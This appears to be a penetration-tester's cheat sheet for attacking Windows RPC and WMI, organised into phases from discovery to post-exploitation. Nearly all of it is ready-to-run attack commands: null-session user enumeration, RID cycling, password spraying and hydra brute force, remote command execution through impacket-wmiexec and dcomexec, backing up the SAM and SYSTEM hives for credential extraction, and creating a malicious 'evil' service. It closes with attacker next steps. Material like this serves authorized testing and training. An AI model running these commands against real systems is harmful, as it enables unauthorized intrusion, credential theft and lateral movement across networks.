Windows Management Instrumentation / Microsoft RPC
Environment Variables / Setup
export IP=
export DOMAIN=domain.local
Phase 1: RPC Service Discovery
Nmap RPC Scripts
nmap -p 135 --script=msrpc-enum,rpc-grind $IP
RPC Endpoint Mapping
# Enumerate RPC endpoints
rpcinfo -p $IP
impacket-rpcmap $IP
# Check specific RPC services
nmap -p 135 --script=msrpc-enum $IP
Phase 2: Anonymous RPC Access
RPCClient Anonymous Session
rpcclient -U "" -N $IP
Common RPCClient Commands
# User enumeration
enumdomusers
enumdomgroups
queryuser <RID>
querygroupmem <RID>
# Domain information
querydominfo
enumdomains
lookupsids
# Share enumeration
netshareenum
netshareenumall
# Printer enumeration
enumprinters
# Exit
exit
Null Session Testing
# Test null session access
smbclient -N -L \\\\$IP
netexec smb $IP -u '' -p ''
enum4linux-ng -A $IP
Phase 3: RPC User Enumeration
SID Enumeration
# Using rpcclient
rpcclient -U "" -N $IP
lookupsids S-1-5-21-domain-500
lookupsids S-1-5-21-domain-501
lookupsids S-1-5-21-domain-512
lookupsids S-1-5-21-domain-513
# Continue with other common RIDs (1000, 1001, 1002, etc.)
Automated User Enumeration
# Using enum4linux-ng
enum4linux-ng -A $IP
# Using netexec
netexec smb $IP -u '' -p '' --users
netexec smb $IP -u '' -p '' --groups
Phase 4: RID Cycling Attack
Manual RID Cycling
# Using rpcclient for RID cycling
rpcclient -U "" -N $IP
# Query users by RID
for i in $(seq 500 1100); do queryuser $i; done
# Or use lookupsids for bulk queries
for i in $(seq 500 1100); do lookupsids S-1-5-21-DOMAIN-$i; done
Automated RID Cycling
# Using impacket-lookupsid
impacket-lookupsid guest@$IP
# Using ridenum
python3 ridenum.py $IP 500 50000 dict.txt
# Using netexec
netexec smb $IP -u guest -p '' --rid-brute
Phase 5: WMI Enumeration
WMI via RPC
# Using impacket-wmiquery (requires credentials)
impacket-wmiquery domain/username:password@$IP "SELECT * FROM Win32_Service"
# Using netexec WMI
netexec wmi $IP -u username -p password --wmi "SELECT * FROM Win32_Process"
Common WMI Queries
# System information
SELECT * FROM Win32_ComputerSystem
SELECT * FROM Win32_OperatingSystem
# Running processes
SELECT * FROM Win32_Process
# Services
SELECT * FROM Win32_Service
# Network configuration
SELECT * FROM Win32_NetworkAdapterConfiguration
# User accounts
SELECT * FROM Win32_UserAccount
# Installed software
SELECT * FROM Win32_Product
Phase 6: RPC Exploitation
Password Spraying via RPC
# Using netexec
netexec smb $IP -u users.txt -p 'Password123!' --continue-on-success
# Using rpcclient with credentials
rpcclient -U "domain/username%password" $IP
RPC Brute Force
# Brute force RPC authentication
hydra -L users.txt -P passwords.txt -t 1 $IP smb
Phase 7: Advanced RPC Attacks
DCOM Enumeration
# Using impacket-dcomexec (requires credentials)
impacket-dcomexec domain/username:password@$IP
# Enumerate DCOM objects
impacket-dcomexec domain/username:password@$IP -object MMC20
WMI Command Execution
# Execute commands via WMI (requires credentials)
impacket-wmiexec domain/username:password@$IP
# Alternative WMI execution
netexec wmi $IP -u username -p password -x "whoami"
Phase 8: RPC Information Gathering
Domain Information via RPC
rpcclient -U "" -N $IP
# Get domain information
querydominfo
enumdomains
# Get domain SID
lsaquery
# Get password policy
getdompwinfo
Trust Relationships
# Enumerate domain trusts
rpcclient -U "" -N $IP
enumtrust
# Get trust information
queryinfo2
Phase 9: RPC Post-Exploitation
Registry Access via RPC
# Using impacket-reg (requires credentials)
impacket-reg domain/username:password@$IP query -keyName HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
# Backup SAM/SYSTEM hives
impacket-reg domain/username:password@$IP backup -keyName HKLM\\SAM
impacket-reg domain/username:password@$IP backup -keyName HKLM\\SYSTEM
Service Manipulation via RPC
# Using impacket-services (requires credentials)
impacket-services domain/username:password@$IP list
impacket-services domain/username:password@$IP create -name evil -display evil -path "cmd.exe /c evil.exe"
impacket-services domain/username:password@$IP start evil
Common RPC Ports & Services
135/tcp - RPC Endpoint Mapper
139/tcp - NetBIOS Session Service
445/tcp - SMB over TCP
593/tcp - RPC over HTTP
1024+ - Dynamic RPC ports
RPC Enumeration Checklist
- Anonymous RPC access testing
- User enumeration via rpcclient
- Group enumeration and membership
- Domain information gathering
- RID cycling for user discovery
- Share enumeration via RPC
- WMI queries (if credentials available)
- Trust relationship enumeration
- Password policy information
Tools Summary
# Enumeration
rpcclient, enum4linux-ng, netexec, rpcinfo
# Exploitation
impacket suite (wmiexec, dcomexec, services, reg)
hydra (brute force)
# WMI specific
impacket-wmiquery, impacket-wmiexec
Common RPC Misconfigurations
- Anonymous RPC access enabled
- Weak or default credentials on service accounts
- Over-privileged service accounts
- Unrestricted WMI access
- Weak password policies revealed via RPC
Next Steps
Once RPC enumeration succeeds:
- Use discovered users for password attacks
- Test obtained credentials on other services
- Leverage WMI for command execution
- Extract additional information via registry/services